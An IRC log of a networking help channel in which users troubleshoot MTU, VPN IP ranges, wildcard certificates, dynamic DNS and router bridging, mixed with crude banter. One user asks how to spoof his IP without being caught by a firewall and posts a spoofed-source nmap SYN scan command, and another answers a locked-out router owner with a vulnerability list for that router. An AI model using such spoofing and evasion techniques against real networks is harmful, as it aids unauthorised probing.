--- Log opened Mon Apr 09 00:00:38 2018
00:01 < wiresharked> Goop: Does increasing the MTU help with slowdowns?
00:09 <+catphish> wiresharked: are you just some kind of automatic nonsense spewing bot?
00:10 < wiresharked> catphish: No
00:10 <+catphish> then please stop doing so
00:11 < wiresharked> Increasing the MTU size is not a good thing then?
00:11 <+catphish> seriously
00:12 <+catphish> such nonsense, no context, mostly fed up with it
00:13 < wiresharked> This is to increase network performance
00:14 <+catphish> mtu needs to be set consistently across a vlan based on the capabilities of all devices, it's very rare to use anything but 1500 on ethernet
00:15 < wiresharked> I'm on wifi though
00:15 < tds> you can do jumbo frames, but that sorta goes against the ethernet standards iirc, so probably best to stick to 1500
00:15 < wiresharked> tds: I'm not using ethernet
00:16 <+catphish> same applies to wifi though
00:16 <+catphish> though potentially different values
00:16 < wiresharked> catphish: Oh OK
00:17 <+catphish> and depending what it's bridged to
00:17 < wiresharked> The MTU in windows is set to 0. Does that mean that DHCP adjusts it?
00:18 < allizom> tds, or anyone else: do you know about my second question?
00:18 <+catphish> probably just default
00:19 < tds> allizom: oh, sorry - doing it on the host header sounds reasonable to me
00:19 < allizom> what other possibilities are there?
00:19 < wiresharked> catphish: OK, I thought an MTU of 0 just means to let the DHCP server set it
00:19 < tds> I guess you could have two IPs, one serving the redirect and one serving whatever site you wanted to serve (and dns spoof to the first)
00:20 < allizom> I see
00:21 < lupine> https://voe.social/system/media_attachments/files/000/088/962/original/a1f5efb68a1309ac.png
00:21 < lupine> repeat after me
00:21 < lupine> hnnnnnnnnnnnnnnnnnnnnnnnnnnng
00:51 < orlock> Hmmmmm
00:54 < zamanf> hello
00:54 < zamanf> is it possible to set a speed limit on udp packages in linux?
00:55 < redrabbit> tc
00:55 < redrabbit> ^use that
01:24 < inc0gn1t0> Super noob issue. I have virtualbox, and I want to copy stuff from the desktop to the vm. I ticked the option to allow, but I'm the vm account is guest user, which is an account I made, and used once, then deleted, before ever using vm. Do I need to sign re-add that same account and log in to it to do this? Also tried with usb stick, same problem, doesn't show the drive
01:25 < inc0gn1t0> And why did it use an account that I had deleted?
01:25 < orlock> i dont even understand what you are talking about
01:26 < inc0gn1t0> Virtual machines..
01:26 < inc0gn1t0> Vm
01:26 < DoYouKnow> inc0gn1t0: you should be able to copy things to the shared folder even when not logged in on the vm
01:26 < DoYouKnow> err
01:26 < DoYouKnow> nevermind, other way around
01:26 < DoYouKnow> you should be able to share things from a logged out pc
01:27 < DoYouKnow> to an external one, using SMB
01:27 < inc0gn1t0> But do the things I share, have to be on that account and not my normal admin account
01:27 < orlock> Did he actually mention SMB anywhere?
01:28 < DoYouKnow> inc0gn1t0: if you're not on the same user/group you have to log in specifying the \ syntax
01:28 < DoYouKnow> err, if you're not on the same machine
01:28 < DoYouKnow> *local vs. network account
01:29 < DoYouKnow> hmm
01:29 < inc0gn1t0> I am on the same machine. I use admin account where everything on the desktop I want is, but vm is user that was deleted.
01:30 < inc0gn1t0> (Luckily I remembered that pw)
01:30 < DoYouKnow> then just use VM_PC\username, password: password manually
01:31 < DoYouKnow> what's the group it's in?
01:31 < DoYouKnow> or is it a local account?
01:31 < inc0gn1t0> Local I believe
01:31 < DoYouKnow> if it's a local account, then just log in with a different local account
01:31 < DoYouKnow> windows or linux?
01:31 < inc0gn1t0> Win10
01:31 < DoYouKnow> map network drive is what used to be used
01:32 < inc0gn1t0> I hate it
01:32 < DoYouKnow> I haven't used it in a while, though
01:32 < DoYouKnow> it's not bad
01:32 < inc0gn1t0> Same. I always use linux
01:32 < DoYouKnow> but linux has a better SAMBA
01:32 < DoYouKnow> (at times)
01:32 < DoYouKnow> been using the SAMBA on Mint/Ubuntu a lot
01:33 < DoYouKnow> for pc to pc transfer, when a usb stick is not available
01:34 < inc0gn1t0> I know, I want my debian back, but it's a brand new laptop and can play all my games from steam... kinda don't wanna give that up lol. And windows doesn't like dual boot linux
01:34 < orlock> we are getting rid of our last Samba server
01:35 < orlock> Not that linux isnt great, but if you are windows desktops everywhere and have multiple AD and Windows fileservers already, a single Samba server is just a pain
01:36 < inc0gn1t0> What's samba
01:36 < inc0gn1t0> I keep hearing that
01:38 < gray79> its a file sharing protocol
01:39 < orlock> It's the open source server that provides SMB/CIFS shares in the same way windows file servers do
01:40 < orlock> so you can use non-windows systems to share files to Windows clients
01:40 < forgotten> what do you mean windows doesn't like linux dual boot?
01:41 < orlock> Did somebody mention dual boot?
01:44 < orlock> time for a kernel upgrade
01:49 < inc0gn1t0> So the problem is that it says I need to "install guest additions cd" under device options. But clicking it does nothing
01:53 < forgotten> i obv came into this convo way late.
01:53 < inc0gn1t0> forgotten: I've always had problems with dual boot. Windows doesn't like u putting nonwindows stuff in
01:54 < forgotten> inc0gn1t0: maybe the problem is your setup process :)
01:54 < inc0gn1t0> I've followed the tutorials to the tee. It worked, but constant switching eventually gave me the bsod
01:54 < inc0gn1t0> Blue screen of death
01:55 < inc0gn1t0> Maybe it's because my distro wasn't made to be an everyday os
01:56 < gray79> anyone knows why Wake on Lan doesn't work reliably through the WAN via port forwarding?
01:56 < gray79> i've been pulling my hair for a while
01:57 < forgotten> the two operate independently, lots of hard power offs etc. will eventually take its toll on ntfs
01:57 < chezidek> gray79: isnt it a broadcast packet?
01:58 < inc0gn1t0> It prolly was hard shitdowns😶 used to be a bad habit of mine
01:58 < inc0gn1t0> *shutdowns
01:58 < inc0gn1t0> Lol
01:58 < gray79> my router can only do forwarding to a specific device. The thing is that it works just not always
01:58 < forgotten> yep. or just forgetting to plug it back in on a laptop and it dies cause of the battery etc
01:58 < gray79> idk whats the problem
01:59 < forgotten> gray79: sending multiple packets?
01:59 < gray79> yep
01:59 < inc0gn1t0> Isn't there a way to autoinitiate a proper shutdown at a certain battery percentage?
01:59 < forgotten> inc0gn1t0: probably ya
02:00 < forgotten> hell i could probably powershell that with a scheduled task if not.
02:00 < forgotten> anything is possible :D
02:00 < inc0gn1t0> Cron?
02:00 < forgotten> scheduled tasks on windows.
02:00 < inc0gn1t0> Ah. Thank u
02:01 < inc0gn1t0> Been years since I was behind a windows machine lol
02:15 < SporkWitch> inc0gn1t0: lucky; they forced one on me for work :'(
02:16 < inc0gn1t0> Damn lol
02:19 < SporkWitch> best part: there are TWO things that i need for work that i can't do natively. One is our chat application, which is only on windows and mac (can just throw it in a VM or WINE), the other is a particular web interface that requires silverlight (can do it in WINE). The rest is standard web interfaces that work fine in chrome and firefox, or accessing servers and routers via ssh and telnet lol
03:26 < mast> Anyone here use/work with rosewill server cases?
03:35 * fryguy has
03:35 < forgotten> fries?
03:35 < forgotten> onion rings?
03:36 < forgotten> TATOR TOTS?!
03:40 < Irritiable|LT> WHAT 'R' TATERS?! forgotten
03:41 < Irritiable|LT> You know? Boil 'em, mash 'em, stick 'em in a stew!
03:42 < forgotten> :D
03:42 < forgotten> we wants to eats it already! stupid fat hobbit
03:46 < K350> I'm on Ubuntu 17.10. Internet connection works fine. BUT in nmcli device status my ethernet device is shown as not connected. So are all other devices. Why is that ?
03:46 < Irritiable|LT> Your mom.
03:47 < K350> My devices are all set in Network Manager. But , again, in nmcli they're shown as not being connected. While I'm connected to internet.
03:47 < forgotten> K350: maybe try #Ubuntu ?
03:49 < forgotten> im watching this God Code show on History channel.. just thinking to myself isn't this what Indiana Jones Raiders of the Lost Ark already solved? :D
03:49 < K350> forgotten: Yeah, But I think people in this channel are more skilled regarding networking
03:50 < forgotten> K350: it sounds like a glitch in Ubuntu 17.10 / nmcli. have you confirmed in previous version etc?
03:50 < forgotten> it works fine for me on Kali rolling
03:51 < K350> forgotten: No, I'm trying to identify, locate, the source of the problem
03:51 < K350> forgotten: what version do you run ?
03:51 < forgotten> version of what?
03:52 < K350> forgotten: Sorry, what dist version of Kali are you running?
03:52 < forgotten> latest. rolling. fully up to date.
03:53 < forgotten> uses nmcli version 1.10.6
03:53 < forgotten> is your ubuntu load on a bare metal machine or vm?
03:54 < K350> forgotten: what is the output of cat /etc/issue on your machine ?
03:54 < forgotten> forgotten@kali-vultr:~$ cat /etc/issue
03:54 < forgotten> Kali GNU/Linux Rolling \n \l
03:54 < ne0> I was on a irc channel op said he can ban the whole vpn network I use as well as my phone and DNA
03:55 < ne0> How can he ban the entire network and what's DNA?
03:55 < forgotten> sometimes people refer to DNA as IP space
03:55 < ne0> can you elaborate please
03:57 < forgotten> lmao
03:57 < forgotten> guess my kali machine scared him off
03:57 < ne0> I'm here
03:57 < forgotten> you're k350?
03:57 < ne0> nope
03:58 < ne0> DNA - meaning please
03:58 < forgotten> ne0: just network DNA.. like what are all your subnets you own etc.
03:58 < Irritiable|LT> ne0: Dynamic something acid
03:59 < ne0> what the neck is that?
03:59 < Irritiable|LT> "deoxyribonucleic acid"
03:59 < Irritiable|LT> a self-replicating material present in nearly all living organisms as the main constituent of chromosomes. It is the carrier of genetic information.
03:59 < Irritiable|LT> :)
03:59 < ne0> I didn't know you were funny
04:00 < Irritiable|LT> Nor did I.
04:00 < ne0> laaaaame
04:06 < SporkWitch> ne0: if he's an op, then yes, it's fairly trivial to ban an entire IP range. What companies own what IP ranges can be looked up easily.
04:07 < ne0> sporkwitch: hi
04:07 < ne0> company is Hotspot Shield
04:08 < ne0> https://www.hotspotshield.com
04:08 < SporkWitch> ne0: good example would be how all tor exit nodes were blocked across this entire IRC network until a year or two ago (daft decision, if you ask me; it's trivial to roll a new cert)
04:08 < SporkWitch> ne0: k? what about it?
04:08 < ne0> just letting you know the vpn I use
04:10 < ne0> Banning a DNA? what's a DNA
04:10 < SporkWitch> ne0: lol, it's on uMatrix's blacklist so it doesn't even let you go to the main site lol
04:11 < ne0> what main site?
04:11 < SporkWitch> ne0: here ya go, all the IP ranges owned by them https://bgp.he.net/search?search%5Bsearch%5D=anchorfree&commit=Search
04:12 < ne0> must be more ips than that
04:12 < ne0> Ireland
04:12 < ne0> nx
04:12 < ne0> nz*
04:12 < ne0> Australia etc
04:12 < SporkWitch> those are the ones registered under the company name listed at the bottom of the page you linked
04:13 < ne0> oh lol
04:14 < SporkWitch> that's also quite a few addresses. 256*5 + (2^10)*2
04:14 < ne0> So if some dumb fuk is using the same vpn ip as me and gets banned then everyone with that vpn is banned from that room?
04:15 < SporkWitch> everyone currently on that IP, sure; banning whole ranges is USUALLY reserved for repeat offenders from the same provider and a failure of that provider to sanction their users
04:15 < SporkWitch> (that's why tor was blocked across the board for a long time)
04:15 < ne0> ah got cha
04:16 < ne0> what's the DNA thing?
04:16 < Irritiable|LT> https://www.wired.com/2017/01/get-even-easier-hide-dark-web/ -- Tor's ran by the FBI now anyway.
04:16 < Irritiable|LT> "The attack that allowed that takedown of supposedly untraceable sites—now believed to have been developed by Carnegie Mellon security researchers and obtained by the FBI with a subpoena"
04:17 < superkuh> FUD
04:17 < SporkWitch> ne0: that was already explained earlier
04:17 < forgotten> but if life lock and experian can monitor the dark web, it really isn't too complicated ;)
04:17 < superkuh> And even if it was it's better than the normal web because on Tor you actually own your domain rather than lease it at the whim of some commercial company blown in the winds of politics and mass media.
04:18 < SporkWitch> forgotten: traffic correlation attacks have been very effective for years now anyway
04:18 < superkuh> Most of the traffic to my website comes in on the Tor domain. And that's after filtering out bots.
04:18 < forgotten> im just makin a jab :P dont mind me
04:18 < superkuh> People on tor are still surfing.
04:18 < superkuh> Unlike the clear web where it's all centralized shit.
04:19 < SporkWitch> honestly the only thing i've ever used tor for is when i need to check the clearnet in relation to something i was discussing on i2p; been on the internet way too long, any agency that's interested has plenty of profiling information they could likely make reasonable assumptions about what my traffic was. using it in correlation with i2p, though, is effective in that it masks any correlation
04:19 < SporkWitch> between my activity on i2p and the clearnet
04:20 < SporkWitch> (whereas NOT using tor to, say, look something up in relation to a discussion on i2p, would CREATE a correlation between my i2p identity and my clearnet one)
04:20 < Irritiable|LT> https://www.csoonline.com/article/2228873/microsoft-subnet/no-conspiracy-theory-needed--tor-created-for-u-s--gov-t-spying.html
04:20 < Irritiable|LT> Another fun link.
04:22 < ne0> sporkwitch: banning DNA is banning a range of ips?
04:22 < SporkWitch> ne0: yes; bit archaic terminology, i haven't heard it used in years, but it was in use in the past
04:23 < ne0> How do I access the ips of a company
04:23 < ne0> e.g express vpn
04:24 < ne0> and why doesn't Netflix blacklist all of express vpns ips?
04:24 < SporkWitch> ne0: one option is the site i linked earlier
04:24 < SporkWitch> ne0: because netflix doesn't actually WANT to region-lock anything; they stand to make more money the more people are using their service, regardless of where they are. They will do the absolute minimum to block so as not to get sued or have publishers pull out
04:25 < Peng_> I wish Netflix didn't block in-country Hurricane Electric tunnels
04:25 < ne0> ah got cha
04:26 < ne0> who's umatrix?
04:27 < SporkWitch> script-blocking plugin
04:27 < ne0> which site am I black listed from
04:28 < ne0> You said earlier
04:29 < SporkWitch> the VPN service you use; their main site was blacklisted. Normally it'll auto-allow first-party stuff (e.g. the site you're on) and require you to allow stuff from other sites. If a site is particularly nasty, it'll even block it when you try to visit it.
04:29 < SporkWitch> in short: your VPN provider is sketchy as fuck
04:32 < ne0> I'm on the site now with my vpn and it's not blacklisted???
04:32 < SporkWitch> are you using umatrix?
04:33 < ne0> no
04:33 * SporkWitch makes "there you have it" gesture
04:34 < ne0> what is it?
04:35 < SporkWitch> asked and answered...
04:35 < ne0> omg
04:35 < ne0> add on for firefox
04:35 < conr> What would the UFW rule to allow this SSH connection?
04:35 < conr> :1234 -> 10.0.0.1:1234 (Modem/Router) -> Fwd 10.0.99.1:1234 (2nd Router) -> Fwd 10.0.99.100:22 (Ubuntu box using VPN)
04:36 < ne0> can't even use umatrix with my vpn
04:36 < SporkWitch> why not? that's sketchy too, and probably why they blacklist them lol
04:37 < ne0> You told me umatrix blacklisted it......
04:38 < SporkWitch> yes
04:38 < ne0> I'm not using firefox but if I did I wouldn't be able to if I was using my vpn
04:38 < SporkWitch> umatrix blacklists them, implying the site itself is sketchy and/or unsafe in some way. now you're saying you can't use umatrix with your VPN somehow; if that's true, that is even sketchier, and probably why umatrix blacklists them
04:38 < ne0> right?
04:38 < k-man> what does the APN do with respect to a cellular data connection?
04:39 < ne0> ah got you
04:39 < ne0> the site not the software
04:40 < SporkWitch> i feel like we're fighting a translation barrier; i notice it's a german provider, sprecht du Deutsch?
04:40 < ne0> https://bgp.he.net/search?search%5Bsearch%5D=anchorfree&commit=Search
04:40 < ne0> I only see 7 ip address?
04:40 < SporkWitch> no you don't, you see 7 ranges
04:41 < SporkWitch> 5 of those ranges are /24's, so 256 (254 usable) addresses each. the other two are /22's, which means (2^10)-2 usable addresses each.
04:41 < ne0> ah I get it banning DNA means banning the range
04:42 * SporkWitch facepalms
04:42 < ne0> where are the other countries
04:42 < ne0> like China and stuff....
04:43 < SporkWitch> as was ALSO answered earlier, they either don't have any in those regions or they're registered under a different name.
04:43 < forgotten> wow can't believe we're still on this topic
04:43 < ne0> How can I bring up them up?
04:44 < SporkWitch> forgotten: why do you think i just facepalmed? it's circling, most of it answered 5 different ways already, yet the same things. i'd think it was a chatbot if the script weren't so bad
04:44 < forgotten> SporkWitch: you're way more patient than I.
04:44 * forgotten tips hat
04:45 < SporkWitch> forgotten: i'm currently in a customer-facing position; i've also been doing this in IRC and various games for 3 decades now, not to mention admin on a 5k+ member discord server with partner status lol
04:45 < SporkWitch> on the upside, i'm now off the clock and can drink in good conscience lol
04:46 < forgotten> im jealous. i got 2.25 more hours and a 30min drive home still =/
04:46 < forgotten> while my beer is calllllling
04:46 < forgotten> :P
04:46 < SporkWitch> my condolences
04:46 < SporkWitch> wanna work tier 1 tech support? we're hiring lol
04:46 < SporkWitch> (in fairness, our tier 1 is more like most places tier 2)
04:47 < TV`sFrank> Samsquamch season
04:47 < forgotten> doubt you could pay what i'd want
04:47 < TV`sFrank> uh wrong chan
04:47 < SporkWitch> depends lol; i'm only making 4k/yr less than my mate who finished his B.Sc. and landed a programming gig lol
04:47 < forgotten> 150k+ usd?
04:48 < SporkWitch> yeah, probably not lol
04:48 < forgotten> ;)
04:48 < SporkWitch> forgotten: that's entry level, though, right? :P lol
04:48 < ne0> sporkwitch: what's your degree in?
04:48 < forgotten> fairly senior.
04:49 < SporkWitch> ne0: i'm 3 credits short of an A.Sc. in electronics engineering, 3 semesters short of a B.Sc. in computing security (nearly all of that liberal arts classes)
04:49 < wadadli> Does anyone know if Let's Encrypt allows wildcard domains certs?
04:49 < ne0> my nigga!
04:49 < SporkWitch> wadadli: they explicitly do not
04:49 < forgotten> wadadli: as of feb. they do
04:49 < ne0> that's impressive
04:49 < SporkWitch> i stand corrected; i must have missed that email
04:50 < ne0> what's a A.Sc?
04:50 < forgotten> :) feb 2018 they opened up wild card certs
04:50 < wadadli> forgotten: do you know if certbot can procure one?
04:50 < alanhuang> version 0.22 for sure
04:50 < alanhuang> and yes, ACME v2 endpoint is live now
04:50 < SporkWitch> ne0: https://lmgtfy.com/?q=what+is+a.sc.
04:51 < wadadli> alanhuang: sweet.
04:51 < forgotten> wadadli: like alanhuang said, 0.22 should have the wildcard support
04:51 < ne0> lol
04:51 < ne0> I'm studying business this year
04:51 < ne0> I'm 31 though
04:51 < ne0> first year
04:52 < wadadli> I'm trying to generate a certificate for my Router's hotspot captive portal.
04:52 < wadadli> since it's hotspot.techcafe.ag and I already have the domain techcafe.ag
04:52 < SporkWitch> when i hear MBA all i can think of Van Wilder...
04:52 < wadadli> I figured a wildcard domain would be easier.
04:52 < wadadli> cert*
04:53 < ne0> have you guys heard of pwc?
04:53 < alanhuang> *.domain.example does not match domain.example, fyi
04:53 < alanhuang> pwc - pricewaterhousecoopers?
04:53 < SporkWitch> while arguably easier, it does have security implications. and honestly, given how letsencrypt renewals work, it seems to me like it'd be easier to have per-host certs
04:53 < ne0> my brother is a senior there and said he can get me a job as a auditor
04:53 < ne0> when I get my degree
04:53 < wadadli> alanhuang: oh really?
04:53 < ne0> I'm 31 and he's 24
04:53 < forgotten> really depends on the services, and how you plan to automate / distribute certs.
04:53 < wadadli> darn...
04:54 < alanhuang> yes, that's how wildcards work
04:54 < ne0> alanhuang: yeah he works 80+ hours a week
04:54 < alanhuang> you could have *.domain.example and domain.example though, e.g.
04:56 < wadadli> alanhuang: darn, I just got *.techcafe.ag verified.
04:56 < wadadli> and my dns takes forever to propagate..
04:56 < ne0> anyone here going to do networking for the big 4?
05:05 < wadadli> alanhuang: A wildcard certificate can secure any number of subdomains of a base domain (e.g. *.example.com). This allows administrators to use a single certificate and key pair for a domain and all of its subdomains, which can make HTTPS deployment significantly easier.
05:06 < alanhuang> yes, I know what wildcard dns names are
05:06 < alanhuang> what is your point
05:07 < wadadli> what you said contradicts what let's encrypt is saying
05:07 < wadadli> or am I not understanding
05:07 < wadadli> I generated *.techcafe.ag to secure anysubdomain.techcafe.ag essentially.
05:07 < alanhuang> correct, and that's what it would do
05:08 < alanhuang> most user agents would not allow *.techcafe.ag to match techcafe.ag, though
05:08 < RtMF> so add it as a SAN?
05:09 < alanhuang> exactly
05:12 < SporkWitch> which makes sense, because *.techcafe.ag doesn't match; the . is a literal
05:13 < wadadli> So firefox/chrome will not display the secure indicator on my hotspot's captive portal page?
05:13 < alanhuang> if it's techcafe.ag, no
05:13 < wadadli> it's hotspot.techcafe.ag
05:13 < alanhuang> (and assuming techcafe.ag is not a SAN - if it is, then you're good)
05:14 < alanhuang> then yes, a cert for *.techcafe.ag would match
05:14 < wadadli> OK.
05:15 < wadadli> I'd just have to generate another cert for the techcafe.ag
05:15 < wadadli> Is what you're saying.
05:15 < alanhuang> or just add it as a SAN
05:17 < wadadli> Storage Area Network?
05:17 < wadadli> It's an actual website. That's hosted somewhere.
05:18 < alanhuang> Subject Alternative Name
05:18 < alanhuang> the method by which one certificate can be valid for multiple names
05:22 < wadadli> OH. I'll have to look into that.
05:22 < wadadli> A windows PC fails to recognize the certs because their file names begin with *
05:23 < wadadli> ...
05:24 < wadadli> Hope renaming the cert doesn't alter things
05:25 < alanhuang> cert filename is meaningless
05:25 < wadadli> good
05:44 < ghal> I did something super dumb.... I factory reset my router while not being home '>>
05:44 < ghal> Is there anything I can do? It's an Asus-ac68u
05:46 < House> ghal : does this help? https://www.cvedetails.com/vulnerability-list/vendor_id-3447/product_id-27483/Asus-Rt-ac68u-Firmware.html
05:48 < ghal> House: hard to say since I have no idea what firmware I'm running
05:53 < r3m> /
05:54 < electromagnetism> remote admin is probably disabled by default nothing you can do man
05:56 < ghal> Actually I had to disable that myself but yeah
05:58 < ghal> I have no cell phone in the apartment I could bounce over. Laptop and main relay on the router which I cannot access with either the hostname or the ip
05:59 < ghal> This is why you don't stay up for 2 days lol
06:35 < pabed> hi guys , how is it possible my vpn client to two vpn servers at the same time?
06:36 < pabed> *connect
06:37 < skyroveRR> Why would you want to?
06:38 < pabed> I need to know what is happened for ip header at this state?
06:39 < skyroveRR> What do you think happens?
06:39 < pabed> and I need to know why route to internet via one them , while both of them can route me to internet
06:40 < pabed> because I think it has to add extra field to packed by per vpn server
06:41 < pabed> *packet
07:13 < rud0lf> hello, is it a good place to ask a question related to tp-link wifi router config?
07:15 < plasma> hi rud0lf :)
07:15 < rud0lf> hi plasma :)
07:15 < rud0lf> !voice plasma
07:15 < rud0lf> ;)
07:15 < plasma> :D
07:15 < plasma> it is :)
07:15 < rud0lf> i use tp-link range extender, and i like to enable mac filtering on a router
07:16 < rud0lf> regardless what mac i use for extender (i've found 3 different macs), when i enable filtering the extender dies (wifi range diodes go off, no access to extender page)
07:18 < NERD-k> Hello, I have a problem. I am using Fedora-27, and i use shadowsocks-libev.
07:19 < NERD-k> use PROXY socks5, but it always give me the message `Failed to receive SOCKS4 connect request ack.`
07:20 < NERD-k> The web browser is still work
07:21 < NERD-k> I just cannot use curl, git clone and etc in TUI
08:21 < R3D--> cable unplugged "(
08:21 < R3D--> :(
08:21 < R3D--> but cable is plugged
08:39 < NERD-k> Hello, how can let all net use PROXY(socks5), and shutdown PROXY???
08:40 < NERD-k> My computer system is Fedora-27
08:48 <+pppingme> NERD-k you want to let everyone use it then shut it off?
09:01 < Talker> i just bought a thin client computer that i meant to run pfsense with vpn on. but now i'm debating whether i should use the computer for only pfsense with vpn, or run openVPN, bittorrent downloading, plex media center, couchpotato, sonarr, the whole shebang...
09:03 < confusedjoe32> hey guys i wanna suck her toes
09:29 < vhudrox> someone on #freenode referred me here to discuss this https://imgur.com/a/B5ids
09:30 < vhudrox> any thoughts?
09:34 < ychaouche> hello ##networking
09:34 < ychaouche> How do I spoof my IP w/o getting caught by the firewall ?
09:34 < ychaouche> I tried : sudo nmap -Pn -n -sS -p 143 -S 29.30.40.10 -e eth4 --disable-arp-ping 10.10.10.19
09:35 < ychaouche> but tcpdump on the destination doesn't show any sign of incoming connexions
09:36 <@pppingme> ychaouche there's about 1000 problems with what you're doing.
09:36 <@pppingme> first, your isp most likely filters on egress, so they are going to drop it
09:37 <@pppingme> second, chances are, your firewall does the same, drops packets from a network it doesn't know
09:37 < ychaouche> I'm staying in the LAN
09:37 < ychaouche> both source and destination are in the LAN
09:38 < ychaouche> I want to simulate an access from outside to one of my servers to test new firewall rules on that server.
09:39 <@pppingme> what are you really trying to do?
09:39 < ychaouche> I just said
09:40 <@pppingme> how do you know the packets aren't showing up on the destination?
09:41 < ychaouche> tcpdump
09:42 < ychaouche> https://gist.github.com/ychaouche/17335e68ca97aa12ed4f0d42fc6c1ddf
09:55 < Spice_Boy1> any librenms experts in here?
09:55 < Spice_Boy1> in particular, writing applications that use extend snmp oid
10:03 < cgm9> ychaouche: the target needs to have a route for that remote ip 29.x.x.x pointed at your local lan ip
10:03 < cgm9> right now is prob using the default gw to send traffic back
10:03 < cgm9> or try that nmap from default gw,if you can
10:04 < ychaouche> cgm9: I don't need to get the packets back, really.
10:04 < TV`sFrank> cgfbee: s/he is selling this spiel in 2 different channels and users in both are 'skeptical'
10:04 < ychaouche> so why should it have the remote IP routed to my local lan ip ?
10:05 < ychaouche> I only need to know if it gets the packet, I don't need the responses back.
10:05 < ychaouche> (the acks)
10:05 < TV`sFrank> And yet you SAY you're testing your own firewall, which wouldn't send acks. "Hmmmm"
10:06 < hey2> that's a pretty good SYN something is wrong
10:25 < wadadli> I have a computer that I manage for a family member. The ISP always seems to change the public IP, what are some solutions to ensure reliable connection to this PC remotely. Without contacting ISP for a static IP.
10:25 < Spice_Boy1> do you manage it from somewhere with a static IP?
10:25 < at0m> wadadli: afraid.org provides free DNS
10:26 < wadadli> Spice_Boy1: Not quite sure what you mean?
10:26 < at0m> wadadli: .. so even when the client's IP changes, you can still connect to a name you can easily remember
10:26 < Spice_Boy1> (6:24:36 PM) wadadli: I have a computer that I manage for a family member. <-- where do you manage it from?
10:26 < wadadli> From my PC.
10:26 < Spice_Boy1> ffs
10:26 < TV`sFrank> lol
10:27 < wadadli> Well it's a valid answer isn't it lol.
10:27 < _Mental> lol
10:27 < TV`sFrank> If you're a complete noob who has no clue or business managing anything over a network
10:28 < wadadli> at0m: Is this something I install on the PC?
10:34 < ychaouche> wadadli: you configure it on the router (your modem)
10:34 < ychaouche> or rather their modem
10:34 <+xand> if it supports that
10:35 <+xand> otherwise on the PC
10:35 <+xand> otherwise you could use one of those services that provides remote PC access
10:35 <+xand> like errrr logmein maybe
10:36 <+xand> wadadli: how do you login to the PC?
10:38 < wadadli> xand: The windows login manager service, not sure what it's actually called.
10:38 <+xand> remote desktop?
10:38 < wadadli> Oh you mean how do I access its display server?
10:38 < wadadli> I use Team Viewer.
10:38 <+xand> k
10:39 < ^7heo> moin catphish
10:39 <+catphish> 'ello
10:39 < wadadli> ychaouche: AH OK. I'll check it out.
10:39 <+xand> doesn't that connect via their servers so it doesn't need a known IP address?
10:40 < ^7heo> (I swear, I'm not even stalking you)
10:40 < linux_probe> stalk tdees nutz
10:41 < ychaouche> wadadli: yes, why do you even need a static IP when accessing w/ teamviewer ?
10:41 < wadadli> xand: Yes but there are other services which this machine hosts that I use. I don't necessarily need access to the desktop.
10:41 < wadadli> ychaouche: I never said that.
10:42 <+xand> I see
10:42 < _Mental> If you can connect to the remote PC via a 3rd party service, does this not give you a "reliable connection" ?
10:43 < ychaouche> _Mental: teamviewer only for desktop, apparently he accesses other services
10:46 < _Mental> Hmmm I guess I don't understand the question. If you wanted to automate something, I believe TeamViewer's logs show what the remote PC's IP is.
10:47 < _Mental> Though I think at that point, the afraid.org seems much more elegant
10:56 < wadadli> I have a router with exactly two NICs, an Ethernet (ether1) and a Wireless (wlan1). wlan1 is configured in bridge ap mode.
10:57 < wadadli> I added a virtual wlan (wlan2) and put into a bridge, assigned an ip to the bridge and then connected a device to the AP.
10:57 < wadadli> Device is unable to access the internet.
11:00 <+catphish> wadadli: the device is connected to wlan1? does that have anything to do with wlan2, or the bridge?
11:00 <+catphish> or do you mean the device is connected to wlan2?
11:00 < wadadli> wlan2 which is the virtual interface.
11:01 <+catphish> you mean a virtual LAN on the wlan1 hardware?
11:01 <+catphish> (like a second SSID)?
11:02 < wadadli> Yes.
11:02 <+catphish> ok, and which devices are in bridges?
11:02 < wadadli> So, wlan1 is in a bridge-hotspot and wlan2 is in bridge-staff
11:03 < wadadli> Those are the only bridges I have.
11:03 <+catphish> there's really no reason to put just one device in a bridge by the way, but it's not a problem
11:04 <+catphish> ok, so you have bridge-staff, and that has an IP, and wlan2 is in the bridge, and a device is connected to that wlan
11:04 <+catphish> does the client device have an ip address?
11:04 < wadadli> well I am trying to give devices that connect to these SSID different networks.
11:04 <+catphish> yes, that's ok, you're doing it correct so far :) 11:05 < wadadli> Yes, I gave bridge-staff a 192.168.253/24 11:05 < wadadli> ether1 is 192.168.1.2 11:05 < wadadli> I want staff that connect to wlan2 to be on the same network. 11:06 <+catphish> the same network as what? ether1? 11:06 < wadadli> yes. is that the problem? 11:06 < wadadli> and yes client got an ip addr. 11:06 <+catphish> yes, your requirement just got more complicated 11:06 < wadadli> it received 192.168.1.253 11:07 < wadadli> oh darn lol 11:07 <+catphish> right now bridge-staff and ether1 are separate networks 11:07 < wadadli> do I have to put ehter1 in bridge staff? 11:07 <+catphish> if you want them to be the same network, you need to put ether1 and wlan2 in the same bridge, yes 11:07 <+catphish> but... that will likely break everything you already have set up 11:08 < wadadli> if I remove the dhcp server for bridge-staff 11:08 < wadadli> would that fix things? 11:08 <+catphish> you need to remove dhcp from bridge-staff, you need to remove the IP from ether1, assign it to bridge-staff instead, and put ether1 into bridge-staff 11:09 <+catphish> then ether1 and wlan2 will be in the same network, because they'll be in the same bridge-staff 11:09 <+catphish> they'll share the same IP range 11:09 <+catphish> then you just need to make sure bridge-hotspot still works 11:09 <+catphish> hope that all makes sense 11:10 < wadadli> OK, let's give it a go. 11:11 <+catphish> good luck :) 11:12 < wadadli> do I put the dhcp client on bride-staff or ether1? 11:12 <+catphish> bridge-staff 11:12 <+catphish> once an interface is in a bridge *everything* is on the bridge 11:12 < wadadli> ah. 11:12 <+catphish> (except wireless settings) 11:13 < wadadli> so my isps router no longer assigns my static ip based on my mac 11:13 < wadadli> normally would give me 192.168.1.2 11:13 < wadadli> getting 192.168.1.4 11:13 < wadadli> Maybe it thinks I'm still connected? 
